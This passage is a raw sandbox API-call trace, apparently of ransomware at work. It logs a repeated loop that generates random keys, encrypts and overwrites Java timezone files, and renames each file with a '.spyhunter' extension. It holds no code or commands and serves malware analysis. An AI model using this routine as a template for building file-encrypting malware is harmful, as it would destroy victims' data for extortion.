lpNumberOfBytesWritten=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf7f4*, lpNumberOfBytesWritten=0x25cf7b4*=0x4, lpOverlapped=0x0) returned 1 [0125.616] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7b4*=0x30, lpOverlapped=0x0) returned 1 [0125.616] CloseHandle (hObject=0x17c) returned 1 [0125.616] GetProcessHeap () returned 0x2c0000 [0125.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.616] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou.spyhunter") returned 72 [0125.616] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ouagadougou.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ouagadougou.spyhunter")) returned 1 [0125.617] GetProcessHeap () returned 0x2c0000 [0125.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.617] GetProcessHeap () returned 0x2c0000 [0125.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.617] GetProcessHeap () returned 0x2c0000 [0125.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba9a8 | out: hHeap=0x2c0000) returned 1 [0125.617] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7f8 | out: pbBuffer=0x25cf7f8) returned 1 [0125.617] GetProcessHeap () returned 0x2c0000 [0125.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.617] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7f0*=0x30) returned 1 [0125.618] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0125.618] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott") returned 61 [0125.618] StrStrW (lpFirst="Nouakchott", lpSrch=".txt") returned 0x0 [0125.618] GetProcessHeap () returned 0x2c0000 [0125.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.618] ReadFile (in: hFile=0x17c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7b4*=0x55, lpOverlapped=0x0) returned 1 [0125.619] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.619] WriteFile (in: hFile=0x17c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7b4*=0x55, lpOverlapped=0x0) returned 1 [0125.619] GetProcessHeap () returned 0x2c0000 [0125.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.619] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.619] WriteFile (in: hFile=0x17c, lpBuffer=0x25cf7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x25cf7f4*, lpNumberOfBytesWritten=0x25cf7b4*=0x4, lpOverlapped=0x0) returned 1 [0125.620] WriteFile (in: hFile=0x17c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7b4*=0x30, lpOverlapped=0x0) returned 1 [0125.620] CloseHandle (hObject=0x17c) returned 1 [0125.620] GetProcessHeap () returned 0x2c0000 [0125.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.620] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott.spyhunter") returned 71 [0125.620] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nouakchott.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nouakchott.spyhunter")) returned 1 [0125.621] GetProcessHeap () returned 0x2c0000 [0125.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.621] GetProcessHeap () returned 0x2c0000 [0125.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.621] GetProcessHeap () returned 0x2c0000 [0125.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba8e0 | out: hHeap=0x2c0000) returned 1 [0125.621] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7f0 | out: pbBuffer=0x25cf7f0) returned 1 [0125.621] GetProcessHeap () returned 0x2c0000 [0125.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.621] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7e8*=0x30) returned 1 [0125.621] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.626] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey") returned 57 [0125.626] StrStrW (lpFirst="Niamey", lpSrch=".txt") returned 0x0 [0125.626] GetProcessHeap () returned 0x2c0000 [0125.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.626] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7ac*=0x59, lpOverlapped=0x0) returned 1 [0125.627] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.628] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7ac*=0x59, lpOverlapped=0x0) returned 1 [0125.628] GetProcessHeap () returned 0x2c0000 [0125.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.628] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.628] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf7ec*, lpNumberOfBytesWritten=0x25cf7ac*=0x4, lpOverlapped=0x0) returned 1 [0125.628] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7ac*=0x30, lpOverlapped=0x0) returned 1 [0125.628] CloseHandle (hObject=0x170) returned 1 [0125.628] GetProcessHeap () returned 0x2c0000 [0125.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.628] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey.spyhunter") returned 67 [0125.628] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Niamey.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\niamey.spyhunter")) returned 1 [0125.629] GetProcessHeap () returned 0x2c0000 [0125.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.629] GetProcessHeap () returned 0x2c0000 [0125.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.629] GetProcessHeap () returned 0x2c0000 [0125.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb91c0 | out: hHeap=0x2c0000) returned 1 [0125.629] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7f0 | out: pbBuffer=0x25cf7f0) returned 1 [0125.630] GetProcessHeap () returned 0x2c0000 [0125.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7e8*=0x30) returned 1 [0125.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.630] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena") returned 59 [0125.630] StrStrW (lpFirst="Ndjamena", lpSrch=".txt") returned 0x0 [0125.630] GetProcessHeap () returned 0x2c0000 [0125.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.630] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7ac*=0x59, lpOverlapped=0x0) returned 1 [0125.631] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.631] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7ac*=0x59, lpOverlapped=0x0) returned 1 [0125.631] GetProcessHeap () returned 0x2c0000 [0125.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.632] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.632] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x25cf7ec*, lpNumberOfBytesWritten=0x25cf7ac*=0x4, lpOverlapped=0x0) returned 1 [0125.632] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7ac*=0x30, lpOverlapped=0x0) returned 1 [0125.632] CloseHandle (hObject=0x170) returned 1 [0125.632] GetProcessHeap () returned 0x2c0000 [0125.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.632] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena.spyhunter") returned 69 [0125.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Ndjamena.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\ndjamena.spyhunter")) returned 1 [0125.633] GetProcessHeap () returned 0x2c0000 [0125.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.633] GetProcessHeap () returned 0x2c0000 [0125.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.633] GetProcessHeap () returned 0x2c0000 [0125.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9100 | out: hHeap=0x2c0000) returned 1 [0125.633] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7e8 | out: pbBuffer=0x25cf7e8) returned 1 [0125.633] GetProcessHeap () returned 0x2c0000 [0125.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.633] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7e0*=0x30) returned 1 [0125.633] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.634] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi") returned 58 [0125.634] StrStrW (lpFirst="Nairobi", lpSrch=".txt") returned 0x0 [0125.634] GetProcessHeap () returned 0x2c0000 [0125.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.635] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7a4*=0x61, lpOverlapped=0x0) returned 1 [0125.635] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.635] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7a4*=0x61, lpOverlapped=0x0) returned 1 [0125.635] GetProcessHeap () returned 0x2c0000 [0125.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.636] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.636] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf7e4*, lpNumberOfBytesWritten=0x25cf7a4*=0x4, lpOverlapped=0x0) returned 1 [0125.636] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7a4*=0x30, lpOverlapped=0x0) returned 1 [0125.636] CloseHandle (hObject=0x170) returned 1 [0125.636] GetProcessHeap () returned 0x2c0000 [0125.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.636] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi.spyhunter") returned 68 [0125.636] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Nairobi.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\nairobi.spyhunter")) returned 1 [0125.637] GetProcessHeap () returned 0x2c0000 [0125.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.637] GetProcessHeap () returned 0x2c0000 [0125.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.637] GetProcessHeap () returned 0x2c0000 [0125.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9040 | out: hHeap=0x2c0000) returned 1 [0125.637] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7e8 | out: pbBuffer=0x25cf7e8) returned 1 [0125.637] GetProcessHeap () returned 0x2c0000 [0125.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.637] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7e0*=0x30) returned 1 [0125.637] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.637] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia") returned 59 [0125.638] StrStrW (lpFirst="Monrovia", lpSrch=".txt") returned 0x0 [0125.638] GetProcessHeap () returned 0x2c0000 [0125.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.638] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf7a4*=0x4d, lpOverlapped=0x0) returned 1 [0125.639] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.639] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf7a4*=0x4d, lpOverlapped=0x0) returned 1 [0125.639] GetProcessHeap () returned 0x2c0000 [0125.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.639] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.639] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x25cf7e4*, lpNumberOfBytesWritten=0x25cf7a4*=0x4, lpOverlapped=0x0) returned 1 [0125.639] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf7a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf7a4*=0x30, lpOverlapped=0x0) returned 1 [0125.639] CloseHandle (hObject=0x170) returned 1 [0125.639] GetProcessHeap () returned 0x2c0000 [0125.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.639] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia.spyhunter") returned 69 [0125.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Monrovia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\monrovia.spyhunter")) returned 1 [0125.640] GetProcessHeap () returned 0x2c0000 [0125.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.640] GetProcessHeap () returned 0x2c0000 [0125.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.640] GetProcessHeap () returned 0x2c0000 [0125.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb8f80 | out: hHeap=0x2c0000) returned 1 [0125.640] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf7e0 | out: pbBuffer=0x25cf7e0) returned 1 [0125.640] GetProcessHeap () returned 0x2c0000 [0125.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.641] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf7d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf7d8*=0x30) returned 1 [0125.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.642] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu") returned 60 [0125.642] StrStrW (lpFirst="Mogadishu", lpSrch=".txt") returned 0x0 [0125.642] GetProcessHeap () returned 0x2c0000 [0125.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.642] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf79c*=0x49, lpOverlapped=0x0) returned 1 [0125.642] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0125.643] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf79c*=0x49, lpOverlapped=0x0) returned 1 [0125.643] GetProcessHeap () returned 0x2c0000 [0125.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0125.643] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0125.643] WriteFile (in: hFile=0x170, lpBuffer=0x25cf7dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x25cf7dc*, lpNumberOfBytesWritten=0x25cf79c*=0x4, lpOverlapped=0x0) returned 1 [0125.643] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf79c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf79c*=0x30, lpOverlapped=0x0) returned 1 [0125.643] CloseHandle (hObject=0x170) returned 1 [0125.643] GetProcessHeap () returned 0x2c0000 [0125.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0125.643] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu.spyhunter") returned 70 [0125.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Mogadishu.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\mogadishu.spyhunter")) returned 1 [0125.644] GetProcessHeap () returned 0x2c0000 [0125.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.644] GetProcessHeap () returned 0x2c0000 [0125.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.644] GetProcessHeap () returned 0x2c0000 [0125.644] HeapFree (in: hHeap=0x2c0000, 